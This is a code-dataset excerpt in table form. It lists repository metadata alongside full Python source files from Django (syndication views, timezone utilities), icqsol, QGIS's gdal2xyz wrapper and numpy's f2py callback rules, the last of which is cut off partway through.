repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
diegoguimaraes/django | django/contrib/syndication/views.py | 31 | 8809 | from __future__ import unicode_literals
from calendar import timegm
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.http import HttpResponse, Http404
from django.template import loader, TemplateDoesNotExist, RequestContext
from django.utils import feedgenerator
from django.utils.encoding import force_text, iri_to_uri, smart_text
from django.utils.html import escape
from django.utils.http import http_date
from django.utils import six
from django.utils.timezone import get_default_timezone, is_naive, make_aware
def add_domain(domain, url, secure=False):
protocol = 'https' if secure else 'http'
if url.startswith('//'):
# Support network-path reference (see #16753) - RSS requires a protocol
url = '%s:%s' % (protocol, url)
elif not (url.startswith('http://')
or url.startswith('https://')
or url.startswith('mailto:')):
url = iri_to_uri('%s://%s%s' % (protocol, domain, url))
return url
class FeedDoesNotExist(ObjectDoesNotExist):
pass
class Feed(object):
feed_type = feedgenerator.DefaultFeed
title_template = None
description_template = None
def __call__(self, request, *args, **kwargs):
try:
obj = self.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
raise Http404('Feed object does not exist.')
feedgen = self.get_feed(obj, request)
response = HttpResponse(content_type=feedgen.mime_type)
if hasattr(self, 'item_pubdate') or hasattr(self, 'item_updateddate'):
# if item_pubdate or item_updateddate is defined for the feed, set
# header so as ConditionalGetMiddleware is able to send 304 NOT MODIFIED
response['Last-Modified'] = http_date(
timegm(feedgen.latest_post_date().utctimetuple()))
feedgen.write(response, 'utf-8')
return response
def item_title(self, item):
# Titles should be double escaped by default (see #6533)
return escape(force_text(item))
def item_description(self, item):
return force_text(item)
def item_link(self, item):
try:
return item.get_absolute_url()
except AttributeError:
raise ImproperlyConfigured(
'Give your %s class a get_absolute_url() method, or define an '
'item_link() method in your Feed class.' % item.__class__.__name__
)
def __get_dynamic_attr(self, attname, obj, default=None):
try:
attr = getattr(self, attname)
except AttributeError:
return default
if callable(attr):
# Check co_argcount rather than try/excepting the function and
# catching the TypeError, because something inside the function
# may raise the TypeError. This technique is more accurate.
try:
code = six.get_function_code(attr)
except AttributeError:
code = six.get_function_code(attr.__call__)
if code.co_argcount == 2: # one argument is 'self'
return attr(obj)
else:
return attr()
return attr
def feed_extra_kwargs(self, obj):
"""
Returns an extra keyword arguments dictionary that is used when
initializing the feed generator.
"""
return {}
def item_extra_kwargs(self, item):
"""
Returns an extra keyword arguments dictionary that is used with
the `add_item` call of the feed generator.
"""
return {}
def get_object(self, request, *args, **kwargs):
return None
def get_context_data(self, **kwargs):
"""
Returns a dictionary to use as extra context if either
``self.description_template`` or ``self.item_template`` are used.
Default implementation preserves the old behavior
of using {'obj': item, 'site': current_site} as the context.
"""
return {'obj': kwargs.get('item'), 'site': kwargs.get('site')}
def get_feed(self, obj, request):
"""
Returns a feedgenerator.DefaultFeed object, fully populated, for
this feed. Raises FeedDoesNotExist for invalid parameters.
"""
current_site = get_current_site(request)
link = self.__get_dynamic_attr('link', obj)
link = add_domain(current_site.domain, link, request.is_secure())
feed = self.feed_type(
title=self.__get_dynamic_attr('title', obj),
subtitle=self.__get_dynamic_attr('subtitle', obj),
link=link,
description=self.__get_dynamic_attr('description', obj),
language=settings.LANGUAGE_CODE,
feed_url=add_domain(
current_site.domain,
self.__get_dynamic_attr('feed_url', obj) or request.path,
request.is_secure(),
),
author_name=self.__get_dynamic_attr('author_name', obj),
author_link=self.__get_dynamic_attr('author_link', obj),
author_email=self.__get_dynamic_attr('author_email', obj),
categories=self.__get_dynamic_attr('categories', obj),
feed_copyright=self.__get_dynamic_attr('feed_copyright', obj),
feed_guid=self.__get_dynamic_attr('feed_guid', obj),
ttl=self.__get_dynamic_attr('ttl', obj),
**self.feed_extra_kwargs(obj)
)
title_tmp = None
if self.title_template is not None:
try:
title_tmp = loader.get_template(self.title_template)
except TemplateDoesNotExist:
pass
description_tmp = None
if self.description_template is not None:
try:
description_tmp = loader.get_template(self.description_template)
except TemplateDoesNotExist:
pass
for item in self.__get_dynamic_attr('items', obj):
context = self.get_context_data(item=item, site=current_site,
obj=obj, request=request)
if title_tmp is not None:
title = title_tmp.render(RequestContext(request, context))
else:
title = self.__get_dynamic_attr('item_title', item)
if description_tmp is not None:
description = description_tmp.render(RequestContext(request, context))
else:
description = self.__get_dynamic_attr('item_description', item)
link = add_domain(
current_site.domain,
self.__get_dynamic_attr('item_link', item),
request.is_secure(),
)
enc = None
enc_url = self.__get_dynamic_attr('item_enclosure_url', item)
if enc_url:
enc = feedgenerator.Enclosure(
url=smart_text(enc_url),
length=smart_text(self.__get_dynamic_attr('item_enclosure_length', item)),
mime_type=smart_text(self.__get_dynamic_attr('item_enclosure_mime_type', item))
)
author_name = self.__get_dynamic_attr('item_author_name', item)
if author_name is not None:
author_email = self.__get_dynamic_attr('item_author_email', item)
author_link = self.__get_dynamic_attr('item_author_link', item)
else:
author_email = author_link = None
tz = get_default_timezone()
pubdate = self.__get_dynamic_attr('item_pubdate', item)
if pubdate and is_naive(pubdate):
pubdate = make_aware(pubdate, tz)
updateddate = self.__get_dynamic_attr('item_updateddate', item)
if updateddate and is_naive(updateddate):
updateddate = make_aware(updateddate, tz)
feed.add_item(
title=title,
link=link,
description=description,
unique_id=self.__get_dynamic_attr('item_guid', item, link),
unique_id_is_permalink=self.__get_dynamic_attr(
'item_guid_is_permalink', item),
enclosure=enc,
pubdate=pubdate,
updateddate=updateddate,
author_name=author_name,
author_email=author_email,
author_link=author_link,
categories=self.__get_dynamic_attr('item_categories', item),
item_copyright=self.__get_dynamic_attr('item_copyright', item),
**self.item_extra_kwargs(item)
)
return feed
| bsd-3-clause | 951,394,418,455,210,000 | 39.223744 | 99 | 0.581678 | false |
gregvonkuster/icqsol | shapes/icqShape.py | 2 | 2584 | #!/usr/bin/env python
"""
@brief A base class for constructing shapes
@author [email protected]
"""
from __future__ import print_function
from csg.core import CSG
from csg.geom import Vector
import numpy
DEFAULTS = dict(origin=[0.0, 0.0, 0.0],
lengths=[1.0, 1.0, 1.0],
radius=1.0,
angle=90.0,
n_theta=16,
n_phi=8)
def Box(origin, lengths):
"""
Create box
@param origin/low end of the box
@param lengths lengths in x, y, and z
"""
center = [origin[i] + 0.5*lengths[i] for i in range(len(origin))]
radius = [0.5*le for le in lengths]
return CSG.cube(center=center, radius=radius)
def Cone(radius, origin, lengths, n_theta=16):
"""
Create cone
@param radius radius
@param origin location of the focal point
@param lengths lengths of the cone
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cone(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Cylinder(radius, origin, lengths, n_theta=16):
"""
Create cylinder
@param radius radius
@param origin center of low end disk
@param lengths lengths of the cylinder along each axis
@param n_theta number of theta cells
"""
ori = Vector(origin[0], origin[1], origin[2])
end = Vector(origin[0] + lengths[0],
origin[1] + lengths[1],
origin[2] + lengths[2])
return CSG.cylinder(start=ori,
end=end,
radius=radius,
slices=n_theta)
def Sphere(radius, origin, n_theta=16, n_phi=8):
"""
Create sphere
@param radius radius
@param origin center of the sphere
@param n_theta number of theta cells
@param n_phi number of azimuthal cells
"""
return CSG.sphere(center=origin,
radius=radius,
slices=n_theta,
stacks=n_phi)
def CompositeShape(shape_tuples=[], expression=''):
"""
@param shape_tuples list of (variable_name, shape) pairs
@param expression expression involving +, -, and * operations.
"""
for i in range(len(shape_tuples)):
varName = shape_tuples[i][0]
cmd = '{0} = shape_tuples[{1}][1]'.format(varName, i)
exec(cmd)
return eval(expression)
| mit | -911,251,755,296,293,200 | 27.711111 | 69 | 0.561533 | false |
siliconsmiley/QGIS | python/plugins/processing/algs/gdal/gdal2xyz.py | 1 | 2574 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdal2xyz.py
---------------------
Date : September 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'September 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.core.parameters import ParameterRaster
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputTable
from processing.tools.system import isWindows
from processing.algs.gdal.GdalUtils import GdalUtils
class gdal2xyz(GdalAlgorithm):
INPUT = 'INPUT'
BAND = 'BAND'
OUTPUT = 'OUTPUT'
def defineCharacteristics(self):
self.name, self.i18n_name = self.trAlgorithm('gdal2xyz')
self.group, self.i18n_group = self.trAlgorithm('[GDAL] Conversion')
self.addParameter(ParameterRaster(
self.INPUT, self.tr('Input layer'), False))
self.addParameter(ParameterNumber(self.BAND,
self.tr('Band number'), 1, 9999, 1))
self.addOutput(OutputTable(self.OUTPUT, self.tr('xyz')))
def getConsoleCommands(self):
arguments = []
arguments.append('-band')
arguments.append(unicode(self.getParameterValue(self.BAND)))
arguments.append('-csv')
arguments.append(self.getParameterValue(self.INPUT))
arguments.append(self.getOutputValue(self.OUTPUT))
commands = []
if isWindows():
commands = ['cmd.exe', '/C ', 'gdal2xyz.bat',
GdalUtils.escapeAndJoin(arguments)]
else:
commands = ['gdal2xyz.py', GdalUtils.escapeAndJoin(arguments)]
return commands
| gpl-2.0 | -1,840,690,094,829,258,800 | 35.253521 | 75 | 0.542735 | false |
IKholopov/HackUPC2017 | hackupc/env/lib/python3.5/site-packages/django/utils/timezone.py | 57 | 11145 | """
Timezone-related classes and functions.
This module uses pytz when it's available and fallbacks when it isn't.
"""
import sys
import time as _time
from datetime import datetime, timedelta, tzinfo
from threading import local
from django.conf import settings
from django.utils import lru_cache, six
from django.utils.decorators import ContextDecorator
try:
import pytz
except ImportError:
pytz = None
__all__ = [
'utc', 'get_fixed_timezone',
'get_default_timezone', 'get_default_timezone_name',
'get_current_timezone', 'get_current_timezone_name',
'activate', 'deactivate', 'override',
'localtime', 'now',
'is_aware', 'is_naive', 'make_aware', 'make_naive',
]
# UTC and local time zones
ZERO = timedelta(0)
class UTC(tzinfo):
"""
UTC implementation taken from Python's docs.
Used only when pytz isn't available.
"""
def __repr__(self):
return "<UTC>"
def utcoffset(self, dt):
return ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return ZERO
class FixedOffset(tzinfo):
"""
Fixed offset in minutes east from UTC. Taken from Python's docs.
Kept as close as possible to the reference version. __init__ was changed
to make its arguments optional, according to Python's requirement that
tzinfo subclasses can be instantiated without arguments.
"""
def __init__(self, offset=None, name=None):
if offset is not None:
self.__offset = timedelta(minutes=offset)
if name is not None:
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return ZERO
class ReferenceLocalTimezone(tzinfo):
"""
Local time. Taken from Python's docs.
Used only when pytz isn't available, and most likely inaccurate. If you're
having trouble with this class, don't waste your time, just install pytz.
Kept as close as possible to the reference version. __init__ was added to
delay the computation of STDOFFSET, DSTOFFSET and DSTDIFF which is
performed at import time in the example.
Subclasses contain further improvements.
"""
def __init__(self):
self.STDOFFSET = timedelta(seconds=-_time.timezone)
if _time.daylight:
self.DSTOFFSET = timedelta(seconds=-_time.altzone)
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
tzinfo.__init__(self)
def utcoffset(self, dt):
if self._isdst(dt):
return self.DSTOFFSET
else:
return self.STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return self.DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, 0)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
class LocalTimezone(ReferenceLocalTimezone):
"""
Slightly improved local time implementation focusing on correctness.
It still crashes on dates before 1970 or after 2038, but at least the
error message is helpful.
"""
def tzname(self, dt):
is_dst = False if dt is None else self._isdst(dt)
return _time.tzname[is_dst]
def _isdst(self, dt):
try:
return super(LocalTimezone, self)._isdst(dt)
except (OverflowError, ValueError) as exc:
exc_type = type(exc)
exc_value = exc_type(
"Unsupported value: %r. You should install pytz." % dt)
exc_value.__cause__ = exc
if not hasattr(exc, '__traceback__'):
exc.__traceback__ = sys.exc_info()[2]
six.reraise(exc_type, exc_value, sys.exc_info()[2])
utc = pytz.utc if pytz else UTC()
"""UTC time zone as a tzinfo instance."""
def get_fixed_timezone(offset):
"""
Returns a tzinfo instance with a fixed offset from UTC.
"""
if isinstance(offset, timedelta):
offset = offset.seconds // 60
sign = '-' if offset < 0 else '+'
hhmm = '%02d%02d' % divmod(abs(offset), 60)
name = sign + hhmm
return FixedOffset(offset, name)
# In order to avoid accessing settings at compile time,
# wrap the logic in a function and cache the result.
@lru_cache.lru_cache()
def get_default_timezone():
"""
Returns the default time zone as a tzinfo instance.
This is the time zone defined by settings.TIME_ZONE.
"""
if isinstance(settings.TIME_ZONE, six.string_types) and pytz is not None:
return pytz.timezone(settings.TIME_ZONE)
else:
# This relies on os.environ['TZ'] being set to settings.TIME_ZONE.
return LocalTimezone()
# This function exists for consistency with get_current_timezone_name
def get_default_timezone_name():
"""
Returns the name of the default time zone.
"""
return _get_timezone_name(get_default_timezone())
_active = local()
def get_current_timezone():
"""
Returns the currently active time zone as a tzinfo instance.
"""
return getattr(_active, "value", get_default_timezone())
def get_current_timezone_name():
"""
Returns the name of the currently active time zone.
"""
return _get_timezone_name(get_current_timezone())
def _get_timezone_name(timezone):
"""
Returns the name of ``timezone``.
"""
try:
# for pytz timezones
return timezone.zone
except AttributeError:
# for regular tzinfo objects
return timezone.tzname(None)
# Timezone selection functions.
# These functions don't change os.environ['TZ'] and call time.tzset()
# because it isn't thread safe.
def activate(timezone):
"""
Sets the time zone for the current thread.
The ``timezone`` argument must be an instance of a tzinfo subclass or a
time zone name. If it is a time zone name, pytz is required.
"""
if isinstance(timezone, tzinfo):
_active.value = timezone
elif isinstance(timezone, six.string_types) and pytz is not None:
_active.value = pytz.timezone(timezone)
else:
raise ValueError("Invalid timezone: %r" % timezone)
def deactivate():
"""
Unsets the time zone for the current thread.
Django will then use the time zone defined by settings.TIME_ZONE.
"""
if hasattr(_active, "value"):
del _active.value
class override(ContextDecorator):
"""
Temporarily set the time zone for the current thread.
This is a context manager that uses ``~django.utils.timezone.activate()``
to set the timezone on entry, and restores the previously active timezone
on exit.
The ``timezone`` argument must be an instance of a ``tzinfo`` subclass, a
time zone name, or ``None``. If is it a time zone name, pytz is required.
If it is ``None``, Django enables the default time zone.
"""
def __init__(self, timezone):
self.timezone = timezone
def __enter__(self):
self.old_timezone = getattr(_active, 'value', None)
if self.timezone is None:
deactivate()
else:
activate(self.timezone)
def __exit__(self, exc_type, exc_value, traceback):
if self.old_timezone is None:
deactivate()
else:
_active.value = self.old_timezone
# Templates
def template_localtime(value, use_tz=None):
"""
Checks if value is a datetime and converts it to local time if necessary.
If use_tz is provided and is not None, that will force the value to
be converted (or not), overriding the value of settings.USE_TZ.
This function is designed for use by the template engine.
"""
should_convert = (
isinstance(value, datetime) and
(settings.USE_TZ if use_tz is None else use_tz) and
not is_naive(value) and
getattr(value, 'convert_to_local_time', True)
)
return localtime(value) if should_convert else value
# Utilities
def localtime(value, timezone=None):
"""
Converts an aware datetime.datetime to local time.
Local time is defined by the current time zone, unless another time zone
is specified.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value
def now():
"""
Returns an aware or naive datetime.datetime, depending on settings.USE_TZ.
"""
if settings.USE_TZ:
# timeit shows that datetime.now(tz=utc) is 24% slower
return datetime.utcnow().replace(tzinfo=utc)
else:
return datetime.now()
# By design, these four functions don't perform any checks on their arguments.
# The caller should ensure that they don't receive an invalid value like None.
def is_aware(value):
"""
Determines if a given datetime.datetime is aware.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is not None
def is_naive(value):
"""
Determines if a given datetime.datetime is naive.
The concept is defined in Python's docs:
http://docs.python.org/library/datetime.html#datetime.tzinfo
Assuming value.tzinfo is either None or a proper datetime.tzinfo,
value.utcoffset() implements the appropriate logic.
"""
return value.utcoffset() is None
def make_aware(value, timezone=None, is_dst=None):
"""
Makes a naive datetime.datetime in a given time zone aware.
"""
if timezone is None:
timezone = get_current_timezone()
if hasattr(timezone, 'localize'):
# This method is available for pytz time zones.
return timezone.localize(value, is_dst=is_dst)
else:
# Check that we won't overwrite the timezone of an aware datetime.
if is_aware(value):
raise ValueError(
"make_aware expects a naive datetime, got %s" % value)
# This may be wrong around DST changes!
return value.replace(tzinfo=timezone)
def make_naive(value, timezone=None):
"""
Makes an aware datetime.datetime naive in a given time zone.
"""
if timezone is None:
timezone = get_current_timezone()
# If `value` is naive, astimezone() will raise a ValueError,
# so we don't need to perform a redundant check.
value = value.astimezone(timezone)
if hasattr(timezone, 'normalize'):
# This method is available for pytz time zones.
value = timezone.normalize(value)
return value.replace(tzinfo=None)
| apache-2.0 | -5,144,821,128,250,774,000 | 27.576923 | 78 | 0.644594 | false |
ssanderson/numpy | numpy/f2py/cb_rules.py | 153 | 22230 | #!/usr/bin/env python
"""
Build call-back mechanism for f2py2e.
Copyright 2000 Pearu Peterson all rights reserved,
Pearu Peterson <[email protected]>
Permission to use, modify, and distribute this software is given under the
terms of the NumPy License.
NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
$Date: 2005/07/20 11:27:58 $
Pearu Peterson
"""
from __future__ import division, absolute_import, print_function
from . import __version__
from .auxfuncs import (
applyrules, debugcapi, dictappend, errmess, getargs, hasnote, isarray,
iscomplex, iscomplexarray, iscomplexfunction, isfunction, isintent_c,
isintent_hide, isintent_in, isintent_inout, isintent_nothide,
isintent_out, isoptional, isrequired, isscalar, isstring,
isstringfunction, issubroutine, l_and, l_not, l_or, outmess, replace,
stripcomma, throw_error
)
from . import cfuncs
f2py_version = __version__.version
################## Rules for callback function ##############
cb_routine_rules = {
'cbtypedefs': 'typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);',
'body': """
#begintitle#
PyObject *#name#_capi = NULL;/*was Py_None*/
PyTupleObject *#name#_args_capi = NULL;
int #name#_nofargs = 0;
jmp_buf #name#_jmpbuf;
/*typedef #rctype#(*#name#_typedef)(#optargs_td##args_td##strarglens_td##noargs#);*/
#static# #rctype# #callbackname# (#optargs##args##strarglens##noargs#) {
\tPyTupleObject *capi_arglist = #name#_args_capi;
\tPyObject *capi_return = NULL;
\tPyObject *capi_tmp = NULL;
\tint capi_j,capi_i = 0;
\tint capi_longjmp_ok = 1;
#decl#
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_clock();
#endif
\tCFUNCSMESS(\"cb:Call-back function #name# (maxnofargs=#maxnofargs#(-#nofoptargs#))\\n\");
\tCFUNCSMESSPY(\"cb:#name#_capi=\",#name#_capi);
\tif (#name#_capi==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\t#name#_capi = PyObject_GetAttrString(#modulename#_module,\"#argname#\");
\t}
\tif (#name#_capi==NULL) {
\t\tPyErr_SetString(#modulename#_error,\"cb: Callback #argname# not defined (as an argument or module #modulename# attribute).\\n\");
\t\tgoto capi_fail;
\t}
\tif (F2PyCapsule_Check(#name#_capi)) {
\t#name#_typedef #name#_cptr;
\t#name#_cptr = F2PyCapsule_AsVoidPtr(#name#_capi);
\t#returncptr#(*#name#_cptr)(#optargs_nm##args_nm##strarglens_nm#);
\t#return#
\t}
\tif (capi_arglist==NULL) {
\t\tcapi_longjmp_ok = 0;
\t\tcapi_tmp = PyObject_GetAttrString(#modulename#_module,\"#argname#_extra_args\");
\t\tif (capi_tmp) {
\t\t\tcapi_arglist = (PyTupleObject *)PySequence_Tuple(capi_tmp);
\t\t\tif (capi_arglist==NULL) {
\t\t\t\tPyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#argname#_extra_args to tuple.\\n\");
\t\t\t\tgoto capi_fail;
\t\t\t}
\t\t} else {
\t\t\tPyErr_Clear();
\t\t\tcapi_arglist = (PyTupleObject *)Py_BuildValue(\"()\");
\t\t}
\t}
\tif (capi_arglist == NULL) {
\t\tPyErr_SetString(#modulename#_error,\"Callback #argname# argument list is not set.\\n\");
\t\tgoto capi_fail;
\t}
#setdims#
#pyobjfrom#
\tCFUNCSMESSPY(\"cb:capi_arglist=\",capi_arglist);
\tCFUNCSMESS(\"cb:Call-back calling Python function #argname#.\\n\");
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_start_call_clock();
#endif
\tcapi_return = PyObject_CallObject(#name#_capi,(PyObject *)capi_arglist);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_call_clock();
#endif
\tCFUNCSMESSPY(\"cb:capi_return=\",capi_return);
\tif (capi_return == NULL) {
\t\tfprintf(stderr,\"capi_return is NULL\\n\");
\t\tgoto capi_fail;
\t}
\tif (capi_return == Py_None) {
\t\tPy_DECREF(capi_return);
\t\tcapi_return = Py_BuildValue(\"()\");
\t}
\telse if (!PyTuple_Check(capi_return)) {
\t\tcapi_return = Py_BuildValue(\"(N)\",capi_return);
\t}
\tcapi_j = PyTuple_Size(capi_return);
\tcapi_i = 0;
#frompyobj#
\tCFUNCSMESS(\"cb:#name#:successful\\n\");
\tPy_DECREF(capi_return);
#ifdef F2PY_REPORT_ATEXIT
f2py_cb_stop_clock();
#endif
\tgoto capi_return_pt;
capi_fail:
\tfprintf(stderr,\"Call-back #name# failed.\\n\");
\tPy_XDECREF(capi_return);
\tif (capi_longjmp_ok)
\t\tlongjmp(#name#_jmpbuf,-1);
capi_return_pt:
\t;
#return#
}
#endtitle#
""",
'need': ['setjmp.h', 'CFUNCSMESS'],
'maxnofargs': '#maxnofargs#',
'nofoptargs': '#nofoptargs#',
'docstr': """\
\tdef #argname#(#docsignature#): return #docreturn#\\n\\
#docstrsigns#""",
'latexdocstr': """
{{}\\verb@def #argname#(#latexdocsignature#): return #docreturn#@{}}
#routnote#
#latexdocstrsigns#""",
'docstrshort': 'def #argname#(#docsignature#): return #docreturn#'
}
cb_rout_rules = [
{ # Init
'separatorsfor': {'decl': '\n',
'args': ',', 'optargs': '', 'pyobjfrom': '\n', 'freemem': '\n',
'args_td': ',', 'optargs_td': '',
'args_nm': ',', 'optargs_nm': '',
'frompyobj': '\n', 'setdims': '\n',
'docstrsigns': '\\n"\n"',
'latexdocstrsigns': '\n',
'latexdocstrreq': '\n', 'latexdocstropt': '\n',
'latexdocstrout': '\n', 'latexdocstrcbs': '\n',
},
'decl': '/*decl*/', 'pyobjfrom': '/*pyobjfrom*/', 'frompyobj': '/*frompyobj*/',
'args': [], 'optargs': '', 'return': '', 'strarglens': '', 'freemem': '/*freemem*/',
'args_td': [], 'optargs_td': '', 'strarglens_td': '',
'args_nm': [], 'optargs_nm': '', 'strarglens_nm': '',
'noargs': '',
'setdims': '/*setdims*/',
'docstrsigns': '', 'latexdocstrsigns': '',
'docstrreq': '\tRequired arguments:',
'docstropt': '\tOptional arguments:',
'docstrout': '\tReturn objects:',
'docstrcbs': '\tCall-back functions:',
'docreturn': '', 'docsign': '', 'docsignopt': '',
'latexdocstrreq': '\\noindent Required arguments:',
'latexdocstropt': '\\noindent Optional arguments:',
'latexdocstrout': '\\noindent Return objects:',
'latexdocstrcbs': '\\noindent Call-back functions:',
'routnote': {hasnote: '--- #note#', l_not(hasnote): ''},
}, { # Function
'decl': '\t#ctype# return_value;',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n");',
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#.\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'}, 'GETSCALARFROMPYTUPLE'],
'return': '\treturn return_value;',
'_check': l_and(isfunction, l_not(isstringfunction), l_not(iscomplexfunction))
},
{ # String function
'pyobjfrom': {debugcapi: '\tfprintf(stderr,"debug-capi:cb:#name#:%d:\\n",return_value_len);'},
'args': '#ctype# return_value,int return_value_len',
'args_nm': 'return_value,&return_value_len',
'args_td': '#ctype# ,int',
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,return_value,return_value_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\".\\n",return_value);'}
],
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSTRFROMPYTUPLE'],
'return': 'return;',
'_check': isstringfunction
},
{ # Complex function
'optargs': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *return_value
#endif
""",
'optargs_nm': """
#ifndef F2PY_CB_RETURNCOMPLEX
return_value
#endif
""",
'optargs_td': """
#ifndef F2PY_CB_RETURNCOMPLEX
#ctype# *
#endif
""",
'decl': """
#ifdef F2PY_CB_RETURNCOMPLEX
\t#ctype# return_value;
#endif
""",
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting return_value->");'},
"""\
\tif (capi_j>capi_i)
#ifdef F2PY_CB_RETURNCOMPLEX
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,&return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#else
\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,return_value,#ctype#,\"#ctype#_from_pyobj failed in converting return_value of call-back function #name# to C #ctype#\\n\");
#endif
""",
{debugcapi: """
#ifdef F2PY_CB_RETURNCOMPLEX
\tfprintf(stderr,\"#showvalueformat#.\\n\",(return_value).r,(return_value).i);
#else
\tfprintf(stderr,\"#showvalueformat#.\\n\",(*return_value).r,(*return_value).i);
#endif
"""}
],
'return': """
#ifdef F2PY_CB_RETURNCOMPLEX
\treturn return_value;
#else
\treturn;
#endif
""",
'need': ['#ctype#_from_pyobj', {debugcapi: 'CFUNCSMESS'},
'string.h', 'GETSCALARFROMPYTUPLE', '#ctype#'],
'_check': iscomplexfunction
},
{'docstrout': '\t\t#pydocsignout#',
'latexdocstrout': ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{hasnote: '--- #note#'}],
'docreturn': '#rname#,',
'_check': isfunction},
{'_check': issubroutine, 'return': 'return;'}
]
cb_arg_rules = [
{ # Doc
'docstropt': {l_and(isoptional, isintent_nothide): '\t\t#pydocsign#'},
'docstrreq': {l_and(isrequired, isintent_nothide): '\t\t#pydocsign#'},
'docstrout': {isintent_out: '\t\t#pydocsignout#'},
'latexdocstropt': {l_and(isoptional, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrreq': {l_and(isrequired, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrout': {isintent_out: ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{l_and(hasnote, isintent_hide): '--- #note#',
l_and(hasnote, isintent_nothide): '--- See above.'}]},
'docsign': {l_and(isrequired, isintent_nothide): '#varname#,'},
'docsignopt': {l_and(isoptional, isintent_nothide): '#varname#,'},
'depend': ''
},
{
'args': {
l_and(isscalar, isintent_c): '#ctype# #varname_i#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *#varname_i#_cb_capi',
isarray: '#ctype# *#varname_i#',
isstring: '#ctype# #varname_i#'
},
'args_nm': {
l_and(isscalar, isintent_c): '#varname_i#',
l_and(isscalar, l_not(isintent_c)): '#varname_i#_cb_capi',
isarray: '#varname_i#',
isstring: '#varname_i#'
},
'args_td': {
l_and(isscalar, isintent_c): '#ctype#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *',
isarray: '#ctype# *',
isstring: '#ctype#'
},
# untested with multiple args
'strarglens': {isstring: ',int #varname_i#_cb_len'},
'strarglens_td': {isstring: ',int'}, # untested with multiple args
# untested with multiple args
'strarglens_nm': {isstring: ',#varname_i#_cb_len'},
},
{ # Scalars
'decl': {l_not(isintent_c): '\t#ctype# #varname_i#=(*#varname_i#_cb_capi);'},
'error': {l_and(isintent_c, isintent_out,
throw_error('intent(c,out) is forbidden for callback scalar arguments')):
''},
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
{isintent_out:
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,#varname_i#_cb_capi,#ctype#,"#ctype#_from_pyobj failed in converting argument #varname# of call-back function #name# to C #ctype#\\n");'},
